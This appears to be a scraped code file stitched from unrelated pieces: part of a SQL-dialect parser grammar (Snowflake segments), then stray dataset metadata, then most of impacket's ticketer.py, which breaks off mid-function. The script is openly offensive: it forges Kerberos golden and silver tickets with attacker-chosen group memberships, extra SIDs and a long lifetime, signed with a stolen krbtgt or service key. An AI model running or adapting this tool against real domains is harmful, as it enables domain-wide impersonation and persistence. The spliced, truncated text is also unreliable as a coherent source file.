ansi_dialect.get_segment("SelectClauseModifierSegment") # type: ignore ): """Things that come after SELECT but before the columns. In snowflake we go back to similar functionality as the ANSI version in the root dialect, without the things added in postgres. """ @snowflake_dialect.segment() class QualifyClauseSegment(BaseSegment): """A `QUALIFY` clause like in `SELECT`. https://docs.snowflake.com/en/sql-reference/constructs/qualify.html """ type = "having_clause" match_grammar = StartsWith( "QUALIFY", terminator=OneOf( "ORDER", "LIMIT", ), ) parse_grammar = Sequence( "QUALIFY", Indent, OneOf( Bracketed( Ref("ExpressionSegment"), ), Ref("ExpressionSegment"), ), Dedent, ) @snowflake_dialect.segment(replace=True) class SelectStatementSegment(ansi_dialect.get_segment("SelectStatementSegment")): # type: ignore """A snowflake `SELECT` statement including optional Qualify. https://docs.snowflake.com/en/sql-reference/constructs/qualify.html """ type = "select_statement" match_grammar = StartsWith( # NB: In bigquery, the select clause may include an EXCEPT, which # will also match the set operator, but by starting with the whole # select clause rather than just the SELECT keyword, we normally # mitigate that here. But this isn't BigQuery! So we can be more # efficient and just just the keyword. "SELECT", terminator=Ref("SetOperatorSegment"), ) parse_grammar = ansi_dialect.get_segment( "SelectStatementSegment" ).parse_grammar.copy( insert=[Ref("QualifyClauseSegment", optional=True)], before=Ref("OrderByClauseSegment", optional=True), ) @snowflake_dialect.segment() class UseStatementSegment(BaseSegment): """A snowflake `USE` statement. https://docs.snowflake.com/en/sql-reference/sql/use.html """ type = "use_statement" match_grammar = StartsWith("USE") parse_grammar = Sequence( "USE", OneOf("ROLE", "WAREHOUSE", "DATABASE", "SCHEMA", optional=True), Ref("ObjectReferenceSegment"), ) @snowflake_dialect.segment() class CreateCloneStatementSegment(BaseSegment): """A snowflake `CREATE ... CLONE` statement. https://docs.snowflake.com/en/sql-reference/sql/create-clone.html """ type = "create_clone_statement" match_grammar = Sequence( "CREATE", Sequence("OR", "REPLACE", optional=True), OneOf( "DATABASE", "SCHEMA", "TABLE", "SEQUENCE", Sequence("FILE", "FORMAT"), "STAGE", "STREAM", "TASK", ), Sequence("IF", "NOT", "EXISTS", optional=True), Ref("SingleIdentifierGrammar"), "CLONE", Ref("SingleIdentifierGrammar"), OneOf( Ref("FromAtExpressionSegment"), Ref("FromBeforeExpressionSegment"), optional=True, ), ) @snowflake_dialect.segment() class CreateStatementSegment(BaseSegment): """A snowflake `CREATE` statement. https://docs.snowflake.com/en/sql-reference/sql/create.html """ type = "create_statement" match_grammar = Sequence( "CREATE", Sequence("OR", "REPLACE", optional=True), OneOf( Sequence("NETWORK", "POLICY"), Sequence("RESOURCE", "MONITOR"), "SHARE", "ROLE", "USER", "WAREHOUSE", Sequence("NOTIFICATION", "INTEGRATION"), Sequence("SECURITY", "INTEGRATION"), Sequence("STORAGE", "INTEGRATION"), Sequence("EXTERNAL", "TABLE"), "VIEW", Sequence("MATERIALIZED", "VIEW"), Sequence("SECURE", "VIEW"), Sequence("MASKING", "POLICY"), "PIPE", "FUNCTION", Sequence("EXTERNAL", "FUNCTION"), "PROCEDURE", # Objects that also support clone "DATABASE", "SCHEMA", "TABLE", "SEQUENCE", Sequence("FILE", "FORMAT"), "STAGE", "STREAM", "TASK", ), Sequence("IF", "NOT", "EXISTS", optional=True), Ref("ObjectReferenceSegment"), Ref("CreateStatementCommentSegment", optional=True), Ref.keyword("AS", optional=True), Ref("SelectStatementSegment", optional=True), ) @snowflake_dialect.segment() class ShowStatementSegment(BaseSegment): """A snowflake `SHOW` statement. https://docs.snowflake.com/en/sql-reference/sql/show.html """ _object_types_plural = OneOf( "PARAMETERS", Sequence("GLOBAL", "ACCOUNTS"), "REGIONS", Sequence("REPLICATION", "ACCOUNTS"), Sequence("REPLICATION", "DATABASES"), "PARAMETERS", "VARIABLES", "TRANSACTIONS", "LOCKS", "PARAMETERS", "FUNCTIONS", Sequence("NETWORK", "POLICIES"), "SHARES", "ROLES", "GRANTS", "USERS", "WAREHOUSES", "DATABASES", Sequence( OneOf("API", "NOTIFICATION", "SECURITY", "STORAGE", optional=True), "INTEGRATIONS", ), "SCHEMAS", "OBJECTS", "TABLES", Sequence("EXTERNAL", "TABLES"), "VIEWS", Sequence("MATERIALIZED", "VIEWS"), Sequence("MASKING", "POLICIES"), "COLUMNS", Sequence("FILE", "FORMATS"), "SEQUENCES", "STAGES", "PIPES", "STREAMS", "TASKS", Sequence("USER", "FUNCTIONS"), Sequence("EXTERNAL", "FUNCTIONS"), "PROCEDURES", Sequence("FUTURE", "GRANTS"), ) _object_scope_types = OneOf( "ACCOUNT", "SESSION", Sequence( OneOf( "DATABASE", "SCHEMA", "SHARE", "ROLE", "TABLE", "TASK", "USER", "WAREHOUSE", "VIEW", ), Ref("ObjectReferenceSegment", optional=True), ), ) type = "show_statement" match_grammar = Sequence( "SHOW", OneOf("TERSE", optional=True), _object_types_plural, OneOf("HISTORY", optional=True), Sequence("LIKE", Ref("QuotedLiteralSegment"), optional=True), Sequence( OneOf("ON", "TO", "OF", "IN"), OneOf( Sequence(_object_scope_types), Ref("ObjectReferenceSegment"), ), optional=True, ), Sequence("STARTS", "WITH", Ref("QuotedLiteralSegment"), optional=True), Sequence("WITH", "PRIMARY", Ref("ObjectReferenceSegment"), optional=True), Sequence( Ref("LimitClauseSegment"), Sequence("FROM", Ref("QuotedLiteralSegment"), optional=True), optional=True, ), ) @snowflake_dialect.segment() class AlterUserSegment(BaseSegment): """`ALTER USER` statement. https://docs.snowflake.com/en/sql-reference/sql/alter-user.html All user parameters can be found here https://docs.snowflake.com/en/sql-reference/parameters.html """ type = "alter_user" match_grammar = StartsWith( Sequence("ALTER", "USER"), ) parse_grammar = Sequence( "ALTER", "USER", Sequence("IF", "EXISTS", optional=True), Ref("ObjectReferenceSegment"), OneOf( Sequence("RENAME", "TO", Ref("ObjectReferenceSegment")), Sequence("RESET", "PASSWORD"), Sequence("ABORT", "ALL", "QUERIES"), Sequence( "ADD", "DELEGATED", "AUTHORIZATION", "OF", "ROLE", Ref("ObjectReferenceSegment"), "TO", "SECURITY", "INTEGRATION", Ref("ObjectReferenceSegment"), ), Sequence( "REMOVE", "DELEGATED", OneOf( Sequence( "AUTHORIZATION", "OF", "ROLE", Ref("ObjectReferenceSegment") ), "AUTHORIZATIONS", ), "FROM", "SECURITY", "INTEGRATION", Ref("ObjectReferenceSegment"), ), # Snowflake supports the SET command with space delimitted parameters, but it also supports # using commas which is better supported by `Delimited`, so we will just use that. Sequence( "SET", Delimited( Sequence( Ref("ParameterNameSegment"), Ref("EqualsSegment"), OneOf(Ref("LiteralGrammar"), Ref("ObjectReferenceSegment")), ), ), ), Sequence("UNSET", Delimited(Ref("ParameterNameSegment"))), ), )
28.078635
105
0.57395
8b50d1da8b365e4e1f065e7d052ddbaa27969c22
42,528
py
Python
tools/impackets/build/scripts-3.8/ticketer.py
c0axial/hackthebox
db9fa3d7b75bf779399d17f8923ff743379631be
[ "MIT" ]
1
2021-03-15T20:05:05.000Z
2021-03-15T20:05:05.000Z
tools/impackets/build/scripts-3.8/ticketer.py
oppsec/hackthebox
dd33e0f182af1ad28812af9662d47bdbbcbea9d3
[ "MIT" ]
null
null
null
tools/impackets/build/scripts-3.8/ticketer.py
oppsec/hackthebox
dd33e0f182af1ad28812af9662d47bdbbcbea9d3
[ "MIT" ]
1
2020-12-29T14:00:13.000Z
2020-12-29T14:00:13.000Z
#!/usr/bin/python3 # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Author: # Alberto Solino (@agsolino) # # Description: # This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC) # allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the # groups, extrasids, etc. # Tickets duration is fixed to 10 years from now (although you can manually change it) # # References: # Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash: # (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it) # Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz # (https://github.com/gentilkiwi/mimikatz) # # Examples: # ./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser # # will create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4. # If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256 # (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as # baduser.ccache. # # ./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain <your domain FQDN> # -request -user <a valid domain user> -password <valid domain user's password> baduser # # will first authenticate against the KDC (using -user/-password) and get a TGT that will be used # as template for customization. Whatever encryption algorithms used on that ticket will be honored, # hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved # as baduser.ccache. # # ToDo: # [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh # [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC # from __future__ import division from __future__ import print_function import argparse import datetime import logging import random import string import sys from calendar import timegm from time import strptime from binascii import unhexlify from pyasn1.codec.der import encoder, decoder from pyasn1.type.univ import noValue from impacket import version from impacket.dcerpc.v5.dtypes import RPC_SID from impacket.dcerpc.v5.ndr import NDRULONG from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \ SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD from impacket.examples import logger from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \ PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \ KERB_NON_KERB_CKSUM_SALT from impacket.krb5.keytab import Keytab from impacket.krb5.crypto import Key, _enctype_table from impacket.krb5.crypto import _checksum_table, Enctype from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \ PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \ VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO from impacket.krb5.types import KerberosTime, Principal from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS class TICKETER: def __init__(self, target, password, domain, options): self.__password = password self.__target = target self.__domain = domain self.__options = options if options.spn: spn = options.spn.split('/') self.__service = spn[0] self.__server = spn[1] if options.keytab is not None: self.loadKeysFromKeytab(options.keytab) # we are creating a golden ticket else: self.__service = 'krbtgt' self.__server = self.__domain @staticmethod def getFileTime(t): t *= 10000000 t += 116444736000000000 return t def loadKeysFromKeytab(self, filename): keytab = Keytab.loadFile(filename) keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain)) if keyblock: if keyblock["keytype"] == Enctype.AES256 or keyblock["keytype"] == Enctype.AES128: options.aesKey = keyblock.hexlifiedValue() elif keyblock["keytype"] == Enctype.RC4: options.nthash = keyblock.hexlifiedValue() else: logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn) def createBasicValidationInfo(self): # 1) KERB_VALIDATION_INFO kerbdata = KERB_VALIDATION_INFO() aTime = timegm(datetime.datetime.utcnow().timetuple()) unixTime = self.getFileTime(aTime) kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 # LogoffTime: A FILETIME structure that contains the time the client's logon # session should expire. If the session should not expire, this structure # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as # an indicator of when to warn the user that the allowed time is due to expire. kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF # KickOffTime: A FILETIME structure that contains LogoffTime minus the user # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the # client should not be logged off, this structure SHOULD have the dwHighDateTime # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF. # The Kerberos service ticket end time is a replacement for KickOffTime. # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of # an account. A recipient of the PAC SHOULD<8> use this value as the indicator # of when the client should be forcibly disconnected. kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32 kerbdata['PasswordCanChange']['dwLowDateTime'] = 0 kerbdata['PasswordCanChange']['dwHighDateTime'] = 0 # PasswordMustChange: A FILETIME structure that contains the time at which # theclient's password expires. If the password will not expire, this # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the # dwLowDateTime member set to 0xFFFFFFFF. kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF kerbdata['EffectiveName'] = self.__target kerbdata['FullName'] = '' kerbdata['LogonScript'] = '' kerbdata['ProfilePath'] = '' kerbdata['HomeDirectory'] = '' kerbdata['HomeDirectoryDrive'] = '' kerbdata['LogonCount'] = 500 kerbdata['BadPasswordCount'] = 0 kerbdata['UserId'] = int(self.__options.user_id) kerbdata['PrimaryGroupId'] = 513 # Our Golden Well-known groups! :) groups = self.__options.groups.split(',') kerbdata['GroupCount'] = len(groups) for group in groups: groupMembership = GROUP_MEMBERSHIP() groupId = NDRULONG() groupId['Data'] = int(group) groupMembership['RelativeId'] = groupId groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED kerbdata['GroupIds'].append(groupMembership) kerbdata['UserFlags'] = 0 kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' kerbdata['LogonServer'] = '' kerbdata['LogonDomainName'] = self.__domain.upper() kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid) kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00' kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD kerbdata['SubAuthStatus'] = 0 kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0 kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0 kerbdata['LastFailedILogon']['dwLowDateTime'] = 0 kerbdata['LastFailedILogon']['dwHighDateTime'] = 0 kerbdata['FailedILogonCount'] = 0 kerbdata['Reserved3'] = 0 kerbdata['ResourceGroupDomainSid'] = NULL kerbdata['ResourceGroupCount'] = 0 kerbdata['ResourceGroupIds'] = NULL validationInfo = VALIDATION_INFO() validationInfo['Data'] = kerbdata return validationInfo def createBasicPac(self, kdcRep): validationInfo = self.createBasicValidationInfo() pacInfos = {} pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents() srvCheckSum = PAC_SIGNATURE_DATA() privCheckSum = PAC_SIGNATURE_DATA() if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value: srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value srvCheckSum['Signature'] = b'\x00' * 16 privCheckSum['Signature'] = b'\x00' * 16 else: srvCheckSum['Signature'] = b'\x00' * 12 privCheckSum['Signature'] = b'\x00' * 12 if len(self.__options.aesKey) == 64: srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value else: srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData() pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData() clientInfo = PAC_CLIENT_INFO() clientInfo['Name'] = self.__target.encode('utf-16le') clientInfo['NameLength'] = len(clientInfo['Name']) pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData() return pacInfos def createBasicTicket(self): if self.__options.request is True: if self.__domain == self.__server: logging.info('Requesting TGT to target domain to use as basis') else: logging.info('Requesting TGT/TGS to target domain to use as basis') if self.__options.hashes is not None: lmhash, nthash = self.__options.hashes.split(':') else: lmhash = '' nthash = '' userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value) tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain, unhexlify(lmhash), unhexlify(nthash), None, self.__options.dc_ip) if self.__domain == self.__server: kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0] else: serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value) tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher, sessionKey) kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0] # Let's check we have all the necessary data based on the ciphers used. Boring checks ticketCipher = int(kdcRep['ticket']['enc-part']['etype']) encPartCipher = int(kdcRep['enc-part']['etype']) if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \ self.__options.nthash is None: logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. ' 'Can\'t continue ( or try running again w/o the -request option)') return None, None if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ self.__options.aesKey is None: logging.critical( 'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' 'Can\'t continue (or try running again w/o the -request option)') return None, None if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \ self.__options.aesKey is not None and len(self.__options.aesKey) > 32: logging.critical( 'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. ' 'Can\'t continue (or try running again w/o the -request option)') return None, None if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None: logging.critical( 'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. ' 'Can\'t continue (or try running again w/o the -request option)') return None, None if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \ self.__options.aesKey is not None and len(self.__options.aesKey) < 64: logging.critical( 'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. ' 'Can\'t continue') return None, None kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value kdcRep['cname']['name-string'] = noValue kdcRep['cname']['name-string'][0] = self.__target else: logging.info('Creating basic skeleton ticket and PAC Infos') if self.__domain == self.__server: kdcRep = AS_REP() kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value else: kdcRep = TGS_REP() kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value kdcRep['pvno'] = 5 if self.__options.nthash is None: kdcRep['padata'] = noValue kdcRep['padata'][0] = noValue kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value etype2 = ETYPE_INFO2() etype2[0] = noValue if len(self.__options.aesKey) == 64: etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value else: etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target) encodedEtype2 = encoder.encode(etype2) kdcRep['padata'][0]['padata-value'] = encodedEtype2 kdcRep['crealm'] = self.__domain.upper() kdcRep['cname'] = noValue kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value kdcRep['cname']['name-string'] = noValue kdcRep['cname']['name-string'][0] = self.__target kdcRep['ticket'] = noValue kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value kdcRep['ticket']['realm'] = self.__domain.upper() kdcRep['ticket']['sname'] = noValue kdcRep['ticket']['sname']['name-string'] = noValue kdcRep['ticket']['sname']['name-string'][0] = self.__service if self.__domain == self.__server: kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper() else: kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value kdcRep['ticket']['sname']['name-string'][1] = self.__server kdcRep['ticket']['enc-part'] = noValue kdcRep['ticket']['enc-part']['kvno'] = 2 kdcRep['enc-part'] = noValue if self.__options.nthash is None: if len(self.__options.aesKey) == 64: kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value else: kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value else: kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value kdcRep['enc-part']['kvno'] = 2 kdcRep['enc-part']['cipher'] = noValue pacInfos = self.createBasicPac(kdcRep) return kdcRep, pacInfos def customizeTicket(self, kdcRep, pacInfos): logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target)) encTicketPart = EncTicketPart() flags = list() flags.append(TicketFlags.forwardable.value) flags.append(TicketFlags.proxiable.value) flags.append(TicketFlags.renewable.value) if self.__domain == self.__server: flags.append(TicketFlags.initial.value) flags.append(TicketFlags.pre_authent.value) encTicketPart['flags'] = encodeFlags(flags) encTicketPart['key'] = noValue encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype'] if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value: encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value: encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)]) else: encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)]) encTicketPart['crealm'] = self.__domain.upper() encTicketPart['cname'] = noValue encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value encTicketPart['cname']['name-string'] = noValue encTicketPart['cname']['name-string'][0] = self.__target encTicketPart['transited'] = noValue encTicketPart['transited']['tr-type'] = 0 encTicketPart['transited']['contents'] = '' encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) # Let's extend the ticket's validity a lil bit ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration)) encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration) encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration) encTicketPart['authorization-data'] = noValue encTicketPart['authorization-data'][0] = noValue encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value encTicketPart['authorization-data'][0]['ad-data'] = noValue # Let's locate the KERB_VALIDATION_INFO and Checksums if PAC_LOGON_INFO in pacInfos: data = pacInfos[PAC_LOGON_INFO] validationInfo = VALIDATION_INFO() validationInfo.fromString(pacInfos[PAC_LOGON_INFO]) lenVal = len(validationInfo.getData()) validationInfo.fromStringReferents(data, lenVal) aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ')) unixTime = self.getFileTime(aTime) kerbdata = KERB_VALIDATION_INFO() kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32 # Let's adjust username and other data validationInfo['Data']['LogonDomainName'] = self.__domain.upper() validationInfo['Data']['EffectiveName'] = self.__target # Our Golden Well-known groups! :) groups = self.__options.groups.split(',') validationInfo['Data']['GroupIds'] = list() validationInfo['Data']['GroupCount'] = len(groups) for group in groups: groupMembership = GROUP_MEMBERSHIP() groupId = NDRULONG() groupId['Data'] = int(group) groupMembership['RelativeId'] = groupId groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED validationInfo['Data']['GroupIds'].append(groupMembership) # Let's add the extraSid if self.__options.extra_sid is not None: extrasids = self.__options.extra_sid.split(',') if validationInfo['Data']['SidCount'] == 0: # Let's be sure user's flag specify we have extra sids. validationInfo['Data']['UserFlags'] |= 0x20 validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY() for extrasid in extrasids: validationInfo['Data']['SidCount'] += 1 sidRecord = KERB_SID_AND_ATTRIBUTES() sid = RPC_SID() sid.fromCanonical(extrasid) sidRecord['Sid'] = sid sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED # And, let's append the magicSid validationInfo['Data']['ExtraSids'].append(sidRecord) else: validationInfo['Data']['ExtraSids'] = NULL validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents() pacInfos[PAC_LOGON_INFO] = validationInfoBlob if logging.getLogger().level == logging.DEBUG: logging.debug('VALIDATION_INFO after making it gold') validationInfo.dump() print ('\n') else: raise Exception('PAC_LOGON_INFO not found! Aborting') logging.info('\tPAC_LOGON_INFO') # Let's now clear the checksums if PAC_SERVER_CHECKSUM in pacInfos: serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: serverChecksum['Signature'] = '\x00' * 12 elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: serverChecksum['Signature'] = '\x00' * 12 else: serverChecksum['Signature'] = '\x00' * 16 pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData() else: raise Exception('PAC_SERVER_CHECKSUM not found! Aborting') if PAC_PRIVSVR_CHECKSUM in pacInfos: privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) privSvrChecksum['Signature'] = '\x00' * 12 if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: privSvrChecksum['Signature'] = '\x00' * 12 elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: privSvrChecksum['Signature'] = '\x00' * 12 else: privSvrChecksum['Signature'] = '\x00' * 16 pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData() else: raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting') if PAC_CLIENT_INFO_TYPE in pacInfos: pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE]) pacClientInfo['ClientId'] = unixTime pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData() else: raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting') logging.info('\tPAC_CLIENT_INFO_TYPE') logging.info('\tEncTicketPart') if self.__domain == self.__server: encRepPart = EncASRepPart() else: encRepPart = EncTGSRepPart() encRepPart['key'] = noValue encRepPart['key']['keytype'] = encTicketPart['key']['keytype'] encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue'] encRepPart['last-req'] = noValue encRepPart['last-req'][0] = noValue encRepPart['last-req'][0]['lr-type'] = 0 encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) encRepPart['nonce'] = 123456789 encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration) encRepPart['flags'] = encodeFlags(flags) encRepPart['authtime'] = str(encTicketPart['authtime']) encRepPart['endtime'] = str(encTicketPart['endtime']) encRepPart['starttime'] = str(encTicketPart['starttime']) encRepPart['renew-till'] = str(encTicketPart['renew-till']) encRepPart['srealm'] = self.__domain.upper() encRepPart['sname'] = noValue encRepPart['sname']['name-string'] = noValue encRepPart['sname']['name-string'][0] = self.__service if self.__domain == self.__server: encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value encRepPart['sname']['name-string'][1] = self.__domain.upper() logging.info('\tEncAsRepPart') else: encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value encRepPart['sname']['name-string'][1] = self.__server logging.info('\tEncTGSRepPart') return encRepPart, encTicketPart, pacInfos def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos): logging.info('Signing/Encrypting final ticket') # We changed everything we needed to make us special. Now let's repack and calculate checksums validationInfoBlob = pacInfos[PAC_LOGON_INFO] validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob)) pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE] pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob)) serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM]) 